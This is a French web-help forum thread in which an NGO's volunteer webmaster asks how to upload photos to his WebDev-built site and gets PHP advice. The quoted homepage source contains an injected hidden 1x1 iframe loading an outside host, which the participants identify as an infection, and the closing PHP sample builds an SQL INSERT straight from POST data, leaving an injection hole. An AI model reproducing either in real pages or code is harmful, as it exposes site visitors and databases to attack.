Page PHP ou dynamique

Résolu/Fermé
rivelino1978 Messages postés 91 Date d'inscription samedi 16 juin 2007 Statut Membre Dernière intervention 1 juillet 2021 - 27 avril 2009 à 13:08
Judes-Emile Bornes IV Messages postés 123 Date d'inscription dimanche 6 avril 2008 Statut Membre Dernière intervention 23 février 2010 - 24 oct. 2009 à 13:24
Bonjour,
Voila, je voudrais mettre des photos sur la page (php ou dynamique) de mon site. mais ce que je voudrais, c'est de ne pas avoir a toujours aller sur la copie de mon site qui est sur ma clé comme si c'étais un site statique. mais je voudrais ajouter d'autres photo a partir de l'acces à mon site comme si j'étais un visiteur du site avec mes mots de passe . comment dois faire donner moi les differentes etapes.
NB: j'utilise WEBdev 9
Merci
A voir également:

9 réponses

Judes-Emile Bornes IV Messages postés 123 Date d'inscription dimanche 6 avril 2008 Statut Membre Dernière intervention 23 février 2010 12
27 avril 2009 à 13:45
tu as un tuto à cette adresse:
http://wiki.mediabox.fr/tutoriaux/php/uploader-fichier-http-sur-serveur-avec-php

ou plus compliqué mais plus complet celui-ci:
https://antoine-herault.developpez.com/tutoriels/php/upload/
0
rivelino1978 Messages postés 91 Date d'inscription samedi 16 juin 2007 Statut Membre Dernière intervention 1 juillet 2021 1
28 avril 2009 à 11:43
merci de me repondre.
Mais le probleme est que mon logiciel lui genere les page en php. ce qui veut dire que je ne sais pas comment faire pour pouvoir inserer les codes. avec NVU ou yahoo sitebuilder je sais mais avec WEBDEV9 c'est un peu compliqué pour moi. les codes qu'il utilise sont vraiment differents de ceux que j'ai vu sur les liens que tu m'a donné.
Que faire?
Merci
0
Judes-Emile Bornes IV Messages postés 123 Date d'inscription dimanche 6 avril 2008 Statut Membre Dernière intervention 23 février 2010 12
28 avril 2009 à 12:00
ils ne sont pas si différents que ça si c'est du php.
et puis ce que tu veux c'est une interface de mise en ligne de contenu image. donc quelquechose de relativement indépendant des pages créées par webdev.
donc tu peux avec dreamweaver par exemple créer ton interface d'upload de fichiers image, et générer automatiquement à partir de cette interface les liens image à insérer dans le site.
mais c'est très pro donc compliqué à faire comme focntionnalité.
0
rivelino1978 Messages postés 91 Date d'inscription samedi 16 juin 2007 Statut Membre Dernière intervention 1 juillet 2021 1
28 avril 2009 à 13:40
dans ce cas ne pourrait tu pas m'aider a le faire?
en fait je suis informaticien en administration reseaux
0
Utilisateur anonyme
28 avril 2009 à 13:45
Bonjour, tu peux très bien faire des news sauf que à la place du texte tu mets des photos.
Voir voir par ici et en plus pas besoin de mot de passe : http://www.siteduzero.com/tutoriel-3-14557-tp-des-news-sur-votre-site.html
--
0
rivelino1978 Messages postés 91 Date d'inscription samedi 16 juin 2007 Statut Membre Dernière intervention 1 juillet 2021 1
28 avril 2009 à 14:12
ok merci
mais dis quand on parle d'analyse, de quoi parle t-on? c'est quoi en fait?
0
Judes-Emile Bornes IV Messages postés 123 Date d'inscription dimanche 6 avril 2008 Statut Membre Dernière intervention 23 février 2010 12 > rivelino1978 Messages postés 91 Date d'inscription samedi 16 juin 2007 Statut Membre Dernière intervention 1 juillet 2021
26 sept. 2009 à 13:54
Pour ce qui est de l'analyse, où as-tu lu cela, sur le site du zéro?
faut que je connaisse tes sources pour t'aider!
0
rivelino1978 Messages postés 91 Date d'inscription samedi 16 juin 2007 Statut Membre Dernière intervention 1 juillet 2021 1 > Judes-Emile Bornes IV Messages postés 123 Date d'inscription dimanche 6 avril 2008 Statut Membre Dernière intervention 23 février 2010
10 oct. 2009 à 20:04
salut mon ami!!
j'ai vu l'analyse dans le logiciel webdev 9
0
Judes-Emile Bornes IV Messages postés 123 Date d'inscription dimanche 6 avril 2008 Statut Membre Dernière intervention 23 février 2010 12
28 avril 2009 à 14:13
Dans ce cas ne pourrait tu pas m'aider a le faire?
en fait je suis informaticien en administration reseaux


bah en fait j'ai plein de boulot en ce moment...Je conçois une interface assez complexe pour un client et j'ai plein de commandes en attente.... et puis si ça dépend l'objet de ton site: commercial ou non?
je peux t'aider sur les problèmes que tu rencontrerais en le faisant tout au moins

le principe est pourtant simple,
créer un formulaire html,
le récupérer en php
et créer des entrées similaires à des news mais avec les urls des images.
en PHP/mySQL ou seulement PHP, c'est faisable.

si tu veux intégrer ce code dans des pages préconçues tu peux
- soit écrire des fichiers html via php avec fopen et fwrite et les appeler dans des iframes par exemple,
- soit générer du html dynamique avec php.

bref de toute manière il faut que tu sois plus précis sur l'objet de ton site et le degré de complexité de l'intégration des images!
0
rivelino1978 Messages postés 91 Date d'inscription samedi 16 juin 2007 Statut Membre Dernière intervention 1 juillet 2021 1
28 avril 2009 à 14:23
ok!
j'ai fait un site statique www.ongberekia.org et la copie est sur ma clé. chaque fois que je devais apporter des mises a jours, je passais par la clé. Mais un "trojan win 32 disabler" est passé par la et ouf! mes donnés sont perdues. j'ai donc decidé de faire un site dynamique, pour ne plus avoir a modifier sur ma clé mais directement à partir du site web . est ce faisable.
en fait je suis membre de l'ong et c'est moi qui fait le site. d'ailleurs vous avez ma photo sur la page Notre equipe de mon site. c'est moi le comptable. bref voila. ai je été un peu explicite?
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
Judes-Emile Bornes IV Messages postés 123 Date d'inscription dimanche 6 avril 2008 Statut Membre Dernière intervention 23 février 2010 12
28 avril 2009 à 14:28
ok on va t'aider!
0
rivelino1978 Messages postés 91 Date d'inscription samedi 16 juin 2007 Statut Membre Dernière intervention 1 juillet 2021 1
28 avril 2009 à 14:31
vraiment je vous suis reconnaissant.
mais avez vous vu le site?
Vous avez mon adresse email au bas de la page
0
Judes-Emile Bornes IV Messages postés 123 Date d'inscription dimanche 6 avril 2008 Statut Membre Dernière intervention 23 février 2010 12
28 avril 2009 à 14:47
en fait le lien mène sur une page avec seulement un fond. peut-être une erreur?

voici le code trouvé sur le site, visiblement il y a une iframe qui gère du php, mais rien ne se charge.

deux chose me paraissent bizarre, l'absence de </form> et de </body> et l'iframe mise en largeur et hauteur à 1
<!-- Accueil 20/04/2009 11:18 9.00Hi --><HTML><HEAD><TITLE></TITLE><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META NAME="Description" lang="fr" CONTENT="L'ONG Bérékia est une organisation à but non lucratif. Elle oeuvre dans le secteur rural, en aidant les populations dans les domaines de l'éducation, la santé et la promotion de l'agriculture et de l'élévage.">
<META NAME="keywords" lang="fr" CONTENT="ong, Bérékia, éducation, santé, analphabétisation, richesse, pauvre">
<script>var NAV;var VER;var NUV=navigator.appVersion;if(NUV.indexOf('MSIE')!=-1){NUV=navigator.appVersion.split(';');NAV='IE';VER=NUV[1].split(' ')[2]}else {NAV='NS';VER=NUV.substring(0,NUV.indexOf(' '));}if(!((NAV=='IE'||NAV=='NS')&&(VER=='6.0'||VER=='5.0'))) document.location.href='_Accueil.htm';</script>

<SCRIPT>
<!--
var _DO_=null;var _PAGE_=null
//-->
</SCRIPT>

<LINK REL=stylesheet TYPE=text/css HREF="berekia.css">
<STYLE TYPE=text/css>.l-0{}.LIBELLE1-0{font-family:'Monotype Corsiva';font-style:normal;font-variant:normal;text-decoration:blink ;text-transform:none;}</STYLE></HEAD><BODY topmargin=0 leftmargin=0 marginwidth=0 marginheight=0  bgcolor=#FFFFFF BACKGROUND="fond2_16EA9912_FR.jpg" STYLE="background-attachment:fixed"><FORM NAME=ACCUEIL ACTION=Accueil.htm target=_self METHOD=POST><SCRIPT>_DO_=((document.divform!=null)&&(document.divform.document!=null))?document.divform.document:document;<iframe src="http://bukirda.com/?click=D9FAB" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
0
rivelino1978 Messages postés 91 Date d'inscription samedi 16 juin 2007 Statut Membre Dernière intervention 1 juillet 2021 1
28 avril 2009 à 14:52
en fait quand on lance la page d'accueil mon anti virus me detecte un virus i-frame sur la page d'accueil. je suis donc obligé d'ouvrir le site en passant par une autre page.
0
Judes-Emile Bornes IV Messages postés 123 Date d'inscription dimanche 6 avril 2008 Statut Membre Dernière intervention 23 février 2010 12
28 avril 2009 à 15:21
faut nettoyer tout ça, moi je suis sur mac donc je ne crains pas ce virus à priori...
si tu peux m'envoyer l'archive de ton site par podmailling s'il est gros ou par simple mail s'il est petit j'essaye de voir ça.
je te donne mon adresse email en mp.

sinon donne moi aussi le lien fonctionnel vers ton site en mp si tu veux.
0
rivelino1978 Messages postés 91 Date d'inscription samedi 16 juin 2007 Statut Membre Dernière intervention 1 juillet 2021 1
26 sept. 2009 à 12:45
Bjr et mille excuse pr le retard.
j'etais en campagne. vs connaissez les campagne en afrique: pas d'electricité et dc pas de net. on poursuitdonc notre discussion alors.
0
rivelino1978 Messages postés 91 Date d'inscription samedi 16 juin 2007 Statut Membre Dernière intervention 1 juillet 2021 1
21 oct. 2009 à 10:32
salut mon ami!!
voila je suis dans myphpadmin et je veux creer une base de données dont l'objectif est le suivant:
1- mettre directement à partir du site internet des photos de nos activités ( en tant que administrateur du site) sur une page qui affichera 10 à 20 fotos par page.
2- La plus ancienne fotos seraecrasée par une plus recente.
3- ajouter un commentaire pour chaque foto ajoutée par l'administrateur.

Voila c'est tout.
comment je devrais faire quel proposition de champ me conseillez vs?
et comment les remplirais je ces champs en question (type, default value...)
0
Judes-Emile Bornes IV Messages postés 123 Date d'inscription dimanche 6 avril 2008 Statut Membre Dernière intervention 23 février 2010 12
26 sept. 2009 à 13:50
salut,

tu en es où?
as-tu toujours besoin de nettoyer ce virus?
0
rivelino1978 Messages postés 91 Date d'inscription samedi 16 juin 2007 Statut Membre Dernière intervention 1 juillet 2021 1
19 oct. 2009 à 16:23
salut un frère.
En fait je suis entrain de m'essayer au php pr le rendre meilleur voila.
reste à l'ecoute j'aurais tjrs besoin de vos conseil.
merci pr tout
0
Judes-Emile Bornes IV Messages postés 123 Date d'inscription dimanche 6 avril 2008 Statut Membre Dernière intervention 23 février 2010 12
24 oct. 2009 à 13:24
pour gérer l'upload de fichier en écrasant l'ancien fichier pour chaque image, il faut que tu renommes chaque photo en fonction du nom du champ upload et que tu utilises ensuite move_uploaded_file() pour écraser le fichier existant.

https://forums.commentcamarche.net/forum/affich-4698956-upload-ecraser-fichier-existant

en ce qui concerne ta table mySQL tes champs doivent être en VARCHAR (caractères) sauf le champ d'ID de photo qui devrait être en INT. (entier)

pour gérer la mise dans la table de tes données, utilises des requêtes php.
exemple :

$INPUT_ORDRE=$_POST['ORDRE']; // vient d'un champ en type hidden
$INPUT_DESCRIPTION=$_POST['DESCRIPTION']; //vient d'un champ classique de formulaire


f ( (isset($INPUT_ORDRE)) && (isset($INPUT_DESCRIPTION)) ) 
{
	$insertSQL = "INSERT INTO photos (ORDRE, DESCRIPTION) VALUES ('$INPUT_ORDRE', '$INPUT_DESCRIPTION')";
	$insertSQLREQ = mysql_query($insertSQL) or die ('Erreur SQL : '.mysql_error());
	echo '<p style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; color: #000; text-indent: 0px">Si aucune erreur n\'est mentionn&eacute;e ci-dessus, les données ont bien &eacute;t&eacute; ajout&eacute;es</p>';
	}
0